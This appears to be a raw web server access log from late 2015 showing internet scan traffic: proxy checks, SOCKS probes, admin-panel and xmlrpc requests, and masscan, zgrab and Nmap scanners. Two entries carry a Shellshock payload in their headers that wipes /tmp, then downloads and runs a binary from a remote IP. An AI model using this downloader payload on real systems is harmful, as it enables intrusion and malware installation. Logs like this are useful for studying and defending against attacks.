104.245.97.236 - - [29/Sep/2015:21:15:18 -0400] "GET /xmlrpc.php HTTP/1.1" 404 162 "-" "-" 91.196.50.33 - - [29/Sep/2015:21:22:48 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 216.218.206.66 - - [30/Sep/2015:00:38:26 -0400] "GET / HTTP/1.1" 502 166 "-" "-" 169.50.3.171 - - [30/Sep/2015:05:28:54 -0400] "GET /xmlrpc.php HTTP/1.1" 404 162 "-" "-" 169.50.3.171 - - [30/Sep/2015:05:28:55 -0400] "" 400 0 "-" "-" 185.25.151.159 - - [30/Sep/2015:05:30:44 -0400] "GET http://testp5.mielno.lubin.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 146.185.239.100 - - [30/Sep/2015:05:54:21 -0400] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=tt2adea600143PRWJTUGYCEFUGP HTTP/1.1" 200 867 "-" "-" 58.213.123.107 - - [30/Sep/2015:06:56:36 -0400] "GET /manager/html HTTP/1.1" 404 564 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" 61.161.130.241 - - [30/Sep/2015:10:34:00 -0400] "GET / HTTP/1.1" 200 867 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-ionw >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ionw >> /tmp/Run.sh;echo /tmp/China.Z-ionw >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-ionw >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ionw >> /tmp/Run.sh;echo /tmp/China.Z-ionw >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" 61.161.130.241 - - [30/Sep/2015:10:36:01 -0400] "GET / HTTP/1.1" 200 867 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-fiuz >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-fiuz >> /tmp/Run.sh;echo /tmp/China.Z-fiuz >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-fiuz >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-fiuz >> /tmp/Run.sh;echo /tmp/China.Z-fiuz >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" 137.117.108.84 - - [30/Sep/2015:11:30:03 -0400] "GET /CFIDE/administrator/ HTTP/1.1" 404 162 "-" "-" 185.49.14.190 - - [30/Sep/2015:13:23:27 -0400] "GET http://testp2.czar.bielawa.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 193.19.118.8 - - [30/Sep/2015:14:47:16 -0400] "GET /admin/ HTTP/1.0" 404 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:30.N) Gecko/20110302 Firefox/30.0" 84.51.79.188 - - [30/Sep/2015:15:20:39 -0400] "GET http://login.yahoo.com/config/isp_verify_user? HTTP/1.0" 404 162 "-" "-" 141.212.122.146 - - [30/Sep/2015:16:19:49 -0400] "CONNECT proxytest.zmap.io:80 HTTP/1.1" 400 166 "-" "-" 66.249.83.195 - - [30/Sep/2015:16:46:03 -0400] "GET / HTTP/1.1" 502 166 "-" "Google favicon" 169.50.3.171 - - [30/Sep/2015:17:13:04 -0400] "GET /xmlrpc.php HTTP/1.1" 404 162 "-" "-" 169.50.3.171 - - [30/Sep/2015:17:13:05 -0400] "" 400 0 "-" "-" 186.64.69.141 - - [30/Sep/2015:18:59:20 -0400] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 162 "http://google.com/search?q=bitcoin" "x00_-gawa.sa.pilipinas.2015" 186.64.69.141 - - [30/Sep/2015:18:59:21 -0400] "GET / HTTP/1.0" 200 867 "-" "x00_-gawa.sa.pilipinas.2015" 186.64.69.141 - - [30/Sep/2015:18:59:21 -0400] "GET / HTTP/1.0" 200 867 "-" "x00_-gawa.sa.pilipinas.2015" 186.64.69.141 - - [30/Sep/2015:18:59:21 -0400] "GET / HTTP/1.0" 200 867 "-" "x00_-gawa.sa.pilipinas.2015" 89.248.172.110 - - [30/Sep/2015:20:37:15 -0400] "GET / HTTP/1.0" 200 867 "-" "Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0" 58.55.121.17 - - [30/Sep/2015:21:26:13 -0400] "GET / HTTP/1.0" 200 867 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 185.49.14.190 - - [30/Sep/2015:22:39:29 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 198.7.58.194 - - [01/Oct/2015:00:19:54 -0400] "GET /admin/i18n/readme.txt HTTP/1.1" 502 166 "-" "python-requests/2.7.0 CPython/2.6.6 Linux/2.6.32-573.3.1.el6.x86_64" 80.82.70.24 - - [01/Oct/2015:01:14:34 -0400] "\x00" 400 166 "-" "-" 80.82.70.24 - - [01/Oct/2015:01:14:35 -0400] "GET http://httpheader.net HTTP/1.1" 200 529 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" 80.82.70.24 - - [01/Oct/2015:01:14:37 -0400] "\x04\x01\x00P\xC6\xCE\x0Eu0\x00" 400 166 "-" "-" 80.82.70.24 - - [01/Oct/2015:01:14:37 -0400] "\x05\x01\x00" 400 166 "-" "-" 80.82.70.24 - - [01/Oct/2015:01:14:38 -0400] "\x04\x01\x00P\xC6\xCE\x0Eu0\x00" 400 166 "-" "-" 66.249.67.130 - - [01/Oct/2015:03:08:10 -0400] "GET /robots.txt HTTP/1.1" 502 166 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 91.196.50.33 - - [01/Oct/2015:06:39:01 -0400] "GET http://testp5.mielno.lubin.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 74.82.47.3 - - [01/Oct/2015:07:46:47 -0400] "GET / HTTP/1.1" 502 166 "-" "-" 95.213.177.126 - - [01/Oct/2015:07:57:41 -0400] "POST http://check.proxyradar.com/azenv.php?auth=144370066197 HTTP/1.1" 404 564 "https://proxyradar.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 66.249.79.243 - - [01/Oct/2015:08:56:45 -0400] "GET /robots.txt HTTP/1.1" 502 166 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 198.20.69.74 - - [01/Oct/2015:11:51:13 -0400] "GET / HTTP/1.1" 502 166 "-" "-" 198.20.69.74 - - [01/Oct/2015:11:51:14 -0400] "GET /robots.txt HTTP/1.1" 502 166 "-" "-" 198.20.69.74 - - [01/Oct/2015:11:51:14 -0400] "GET /sitemap.xml HTTP/1.1" 502 166 "-" "-" 198.20.69.74 - - [01/Oct/2015:11:51:14 -0400] "" 400 0 "-" "-" 198.20.69.74 - - [01/Oct/2015:11:51:15 -0400] "" 400 0 "-" "-" 198.20.69.74 - - [01/Oct/2015:11:51:15 -0400] "" 400 0 "-" "-" 198.20.69.74 - - [01/Oct/2015:11:51:19 -0400] "quit" 400 166 "-" "-" 198.20.69.74 - - [01/Oct/2015:11:51:19 -0400] "" 400 0 "-" "-" 95.213.177.126 - - [01/Oct/2015:12:33:30 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 66.249.67.148 - - [01/Oct/2015:15:22:32 -0400] "GET /robots.txt HTTP/1.1" 502 166 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 95.213.177.122 - - [01/Oct/2015:16:03:05 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 141.212.121.136 - - [01/Oct/2015:16:03:34 -0400] "GET /x HTTP/1.1" 400 166 "-" "Telesphoreo" 80.82.70.24 - - [01/Oct/2015:16:14:50 -0400] "\x00" 400 166 "-" "-" 80.82.70.24 - - [01/Oct/2015:16:14:51 -0400] "GET http://httpheader.net HTTP/1.1" 200 529 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" 80.82.70.24 - - [01/Oct/2015:16:14:53 -0400] "\x04\x01\x00P\xC6\xCE\x0Eu0\x00" 400 166 "-" "-" 80.82.70.24 - - [01/Oct/2015:16:14:53 -0400] "\x04\x01\x00P\xC6\xCE\x0Eu0\x00" 400 166 "-" "-" 80.82.70.24 - - [01/Oct/2015:16:14:55 -0400] "\x05\x01\x00" 400 166 "-" "-" 185.49.14.190 - - [01/Oct/2015:16:39:30 -0400] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 74.91.30.42 - - [01/Oct/2015:16:50:06 -0400] "GET / HTTP/1.1" 200 867 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 206.196.184.94 - - [01/Oct/2015:18:42:19 -0400] "GET / HTTP/1.1" 200 529 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9" 206.196.184.94 - - [01/Oct/2015:18:42:19 -0400] "GET /favicon.ico HTTP/1.1" 404 136 "http://104.236.11.102/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9" 95.213.177.124 - - [01/Oct/2015:19:31:34 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 184.105.247.196 - - [01/Oct/2015:20:55:51 -0400] "GET / HTTP/1.1" 502 166 "-" "-" 66.249.67.16 - - [01/Oct/2015:22:01:15 -0400] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.67.130 - - [01/Oct/2015:22:01:16 -0400] "GET /robots.txt HTTP/1.1" 502 166 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 95.213.177.125 - - [01/Oct/2015:23:03:49 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 95.213.177.122 - - [02/Oct/2015:02:37:45 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 66.249.67.148 - - [02/Oct/2015:02:46:00 -0400] "GET /robots.txt HTTP/1.1" 502 166 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 80.82.70.24 - - [02/Oct/2015:04:52:40 -0400] "\x00" 400 166 "-" "-" 80.82.70.24 - - [02/Oct/2015:04:52:41 -0400] "GET http://httpheader.net HTTP/1.1" 200 529 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" 80.82.70.24 - - [02/Oct/2015:04:52:42 -0400] "\x04\x01\x00P\xC6\xCE\x0Eu0\x00" 400 166 "-" "-" 80.82.70.24 - - [02/Oct/2015:04:52:43 -0400] "\x04\x01\x00P\xC6\xCE\x0Eu0\x00" 400 166 "-" "-" 80.82.70.24 - - [02/Oct/2015:04:52:46 -0400] "\x05\x01\x00" 400 166 "-" "-" 95.213.177.122 - - [02/Oct/2015:06:07:49 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 178.255.87.242 - - [02/Oct/2015:07:03:53 -0400] "HEAD /robots.txt HTTP/1.1" 502 0 "-" "COMODO SSL Checker" 95.213.177.126 - - [02/Oct/2015:09:40:19 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 66.249.64.249 - - [02/Oct/2015:11:13:06 -0400] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.64.3 - - [02/Oct/2015:11:13:06 -0400] "GET /robots.txt HTTP/1.1" 502 166 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 171.25.193.25 - - [02/Oct/2015:11:18:35 -0400] "GET /panel.zip HTTP/1.1" 404 564 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" 198.7.58.194 - - [02/Oct/2015:11:23:51 -0400] "GET /admin/i18n/readme.txt HTTP/1.1" 502 166 "-" "python-requests/2.7.0 CPython/2.6.6 Linux/2.6.32-573.3.1.el6.x86_64" 141.212.122.202 - - [02/Oct/2015:13:06:53 -0400] "GET / HTTP/1.1" 200 867 "-" "Mozilla/5.0 zgrab/0.x" 95.213.177.122 - - [02/Oct/2015:13:10:02 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 91.196.50.33 - - [02/Oct/2015:14:23:30 -0400] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 95.213.177.123 - - [02/Oct/2015:16:35:26 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 80.82.70.24 - - [02/Oct/2015:19:20:37 -0400] "\x00" 400 166 "-" "-" 80.82.70.24 - - [02/Oct/2015:19:20:37 -0400] "GET http://httpheader.net HTTP/1.1" 200 529 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)" 80.82.70.24 - - [02/Oct/2015:19:20:38 -0400] "\x04\x01\x00P\xC0c\xF660\x00" 400 166 "-" "-" 80.82.70.24 - - [02/Oct/2015:19:20:41 -0400] "\x05\x01\x00" 400 166 "-" "-" 95.213.177.126 - - [02/Oct/2015:20:07:45 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 95.213.177.122 - - [02/Oct/2015:23:35:32 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 129.2.205.198 - - [03/Oct/2015:00:25:12 -0400] "GET / HTTP/1.1" 502 568 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.99 Safari/537.36" 93.113.125.11 - - [03/Oct/2015:00:42:44 -0400] "GET /nowherereally HTTP/1.0" 404 162 "-" "\x22nlpproject.info research\x22" 185.25.151.159 - - [03/Oct/2015:00:55:09 -0400] "GET http://testp5.mielno.lubin.pl/testproxy.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0" 112.94.147.75 - - [03/Oct/2015:02:05:21 -0400] "GET / HTTP/1.0" 200 867 "-" "-" 58.249.67.108 - - [03/Oct/2015:02:05:22 -0400] "GET / HTTP/1.1" 200 867 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)" 58.248.199.26 - - [03/Oct/2015:02:05:25 -0400] "GET / HTTP/1.1" 200 867 "-" "-" 112.94.146.143 - - [03/Oct/2015:02:05:26 -0400] "GET / HTTP/1.0" 200 867 "-" "-" 95.213.177.122 - - [03/Oct/2015:03:02:09 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 184.105.139.68 - - [03/Oct/2015:03:25:30 -0400] "GET / HTTP/1.1" 502 166 "-" "-" 95.213.177.123 - - [03/Oct/2015:06:45:13 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 95.213.177.123 - - [03/Oct/2015:10:22:04 -0400] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 166 "-" "-" 128.199.95.16 - - [03/Oct/2015:10:54:35 -0400] "GET https://104.236.11.102/ng12.zip HTTP/1.1" 502 166 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0" 193.19.118.8 - - [03/Oct/2015:12:18:04 -0400] "GET /login/ HTTP/1.0" 404 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:30.N) Gecko/20110302 Firefox/30.0"